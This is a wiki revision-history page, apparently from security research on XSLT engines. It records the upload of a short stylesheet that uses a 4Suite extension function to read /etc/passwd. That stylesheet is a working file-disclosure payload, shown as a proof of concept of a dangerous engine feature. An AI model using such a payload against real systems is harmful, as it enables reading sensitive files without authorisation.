Changes for page Engine_4Suite

Last modified by Nicolas Gregoire on 2012/01/23 12:24

From version Icon 8.1 Icon
edited by Nicolas Gregoire
on 2012/01/14 18:01
Change comment: There is no comment for this version
To version Icon 9.1 Icon
edited by Nicolas Gregoire
on 2012/01/23 12:29
Change comment: Upload new attachment 4suitereadfile.xsl

Summary

Details

Icon 4suitereadfile.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +277 bytes
Content
... ... @@ -1,0 +1,11 @@
1 +<xsl:stylesheet
2 + version="1.0"
3 + xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
4 + xmlns:f="http://xmlns.4suite.org/ext" >
5 +
6 +<xsl:output method="text"/>
7 +<xsl:template match="/">
8 + <xsl:value-of select="f:doc-as-string('/etc/passwd', 'ascii')" />
9 +</xsl:template>
10 +</xsl:stylesheet>
11 +